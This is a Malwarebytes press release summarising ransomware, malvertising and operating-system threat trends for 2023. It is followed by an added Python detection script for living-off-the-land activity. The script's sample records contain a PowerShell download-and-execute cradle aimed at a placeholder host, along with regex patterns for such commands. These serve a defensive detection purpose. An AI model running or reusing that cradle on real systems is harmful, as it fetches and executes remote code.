Ransomware Attacks Increased by 68% in 2023 according to Malwarebytes’ New “2024 ThreatDown State of Malware Report”
Malwarebytes Annual Report Examines the Most Prevailing Threats and Provides Defense Guidance for Organizations
SANTA CLARA, Calif., February 6, 2024 — Malwarebytes, a global leader in real-time cyber protection, today released its 2024 ThreatDown State of Malware report, which reveals that the United States accounted for almost half of all ransomware attacks in 2023. The annual cybersecurity analysis looks at the most prominent attacks and cybercrime tactics across popular operating systems and at how IT teams — particularly those that are resource-constrained — can address them.
“Small and medium-sized organizations face a deluge of cyber threats daily, including ransomware, malware and phishing attacks. This new data spotlights the pervasive cat-and-mouse game between cybercriminals and the security and IT teams on the front lines,” said Mark Stockley, Cybersecurity Evangelist, Malwarebytes ThreatDown Labs. “The threat landscape is constantly evolving, especially with the explosion of AI and new adversaries with fresh strategies and tactics, but if organizations follow our guidance and become equipped to handle these top threats, they are off to a good start in 2024.”
Big Game Ransomware is on the Rise
Alongside the 68% rise in ransomware attacks in 2023, the average ransom demand also climbed significantly. The LockBit gang was responsible for the largest known demand, $80 million, following an attack on Royal Mail. Ransomware groups also evolved their tactics, getting scrappier and more sophisticated in order to hit a higher volume of targets at the same time. For example, the CL0P ransomware gang broke established norms with a series of short, automated campaigns, hitting hundreds of unsuspecting targets simultaneously with attacks based on zero-day exploits.
The repeated use of zero-days also signaled a new level of sophistication, making CL0P the second most active “big game” ransomware group of 2023 despite only a few weeks of activity, while the rivals it outpaced were active in every month of the year. LockBit also remained the most widely used ransomware-as-a-service, accounting for more than twice as many attacks as its nearest competitor in 2023.
Resurgence in Malicious Advertising
Malicious advertising — or malvertising — also made a comeback in 2023, threatening businesses and consumers alike. Countless campaigns appeared impersonating brands such as Amazon, Zoom and WebEx to deliver both Windows and Mac malware through highly convincing ads and websites that trick users into downloading malware onto their devices. Malwarebytes ThreatDown Labs found Amazon, Rufus, Weebly, NotePad++ and Trading View to be the top five most impersonated brands. In addition, Dropbox, Discord, 4sync, Gitlab and Google emerged as the top five most abused hosts. Malwarebytes ThreatDown Labs also found Aurora Stealer, Vidar, Redline Stealer, BatLoader and IcedID to be the top five most frequently discovered malware.
Operating System Threats
In addition to ransomware and malvertising trends, Malwarebytes ThreatDown Labs found attacks on Android, Mac and Windows devices also evolved. Additional key findings include:
- Android banking trojans: Malwarebytes ThreatDown Labs detected Android banking trojans 88,500 times in 2023. In these attacks, banking trojans are disguised as regular apps like QR code scanners, fitness trackers, or even copies of popular applications like Instagram in order to copy banking passwords and steal money directly from accounts.
- Malware on Macs: Malware accounted for 11% of detections on Macs last year. Despite declining PC sales, demand for Macs has grown. Today Macs represent a 31% share of US desktop operating systems, while a quarter of businesses run Macs somewhere on their networks, making Apple’s macOS an increasingly significant target for malicious actors.
- Living Off the Land Attacks: Abuse of Windows Management Instrumentation (WMI) was the top technique (27%) for Living Off the Land (LOTL) cyberattacks. In these attacks, criminals carry out malicious activities using legitimate IT administration tools like WMI or PowerShell.
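Because LOTL activity uses tools that are legitimately present on every Windows host, the usual detection angle is not the tool itself but the context in which it runs: which process launched it and what command line it was given. The script below is an added example and is not part of the Malwarebytes report or its products; it runs two such heuristics over a handful of constructed process-creation records whose field names mirror the Sysmon Event ID 1 columns (Image, ParentImage, CommandLine). The first rule flags a shell or script host spawned by the WMI provider host (WmiPrvSE.exe), the second flags PowerShell launched with an encoded command line and decodes the payload so that a download-and-execute pattern hidden inside it can be matched. The rule names, the event records and the process path values are all constructed for the example.

```python
"""Flag Living-Off-the-Land process creations in constructed Windows
process-creation records (Sysmon Event ID 1 shape). Added example; the
events, rule names and heuristics below are assumptions, not report data."""
import base64
import re
from dataclasses import dataclass

# Script hosts that are suspicious when launched by the WMI provider host.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
WMI_PARENT = "wmiprvse.exe"
# -EncodedCommand may be abbreviated (-e, -enc, ...) and carries UTF-16LE base64.
ENCODED_ARG = re.compile(r"(?i)-e\w*\s+([A-Za-z0-9+/=]{16,})")
# Common PowerShell download-and-execute primitives.
DOWNLOAD_CRADLE = re.compile(
    r"(?i)(downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
    r"invoke-expression|\biex\b|frombase64string)")


@dataclass
class Alert:
    event_id: int
    rule: str
    detail: str


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if absent/invalid."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def evaluate(event: dict) -> list:
    """Apply both LOTL heuristics to one process-creation record."""
    alerts = []
    image = basename(event["Image"])
    parent = basename(event["ParentImage"])
    cmd = event.get("CommandLine", "")
    rid = event["EventRecordID"]
    if parent == WMI_PARENT and image in SCRIPT_HOSTS:
        alerts.append(Alert(rid, "wmi_spawned_script_host", f"{parent} -> {image}"))
    if image in {"powershell.exe", "pwsh.exe"}:
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            alerts.append(Alert(rid, "powershell_encoded_command", decoded[:80]))
        # Match the cradle against the decoded text when there is one.
        text = decoded if decoded is not None else cmd
        hit = DOWNLOAD_CRADLE.search(text)
        if hit:
            alerts.append(Alert(rid, "powershell_download_cradle", hit.group(0)))
    return alerts


def scan(events: list) -> list:
    """Evaluate every record and return all alerts in record order."""
    return [a for ev in events for a in evaluate(ev)]


def _encode_ps(text: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects it."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


# Constructed sample records: one benign launch, one WMI-spawned shell, one
# encoded PowerShell download cradle, one WMI-spawned but harmless PowerShell.
SAMPLE_EVENTS = [
    {"EventRecordID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},
    {"EventRecordID": 2, "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c whoami"},
    {"EventRecordID": 3, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -EncodedCommand " + _encode_ps(
         "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')")},
    {"EventRecordID": 4, "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -ExecutionPolicy Bypass -Command Get-Date"},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"record {alert.event_id}: {alert.rule}: {alert.detail}")
```

Record 4 shows why the parent-process rule matters on its own: the command line is unremarkable, and only the fact that WmiPrvSE.exe launched the shell marks it for review. Record 3 shows the opposite case, where the parent is ordinary and the evidence only appears after the encoded argument is decoded. In production these rules would be tuned against the environment's known WMI-driven automation to keep the first rule from firing on legitimate management jobs.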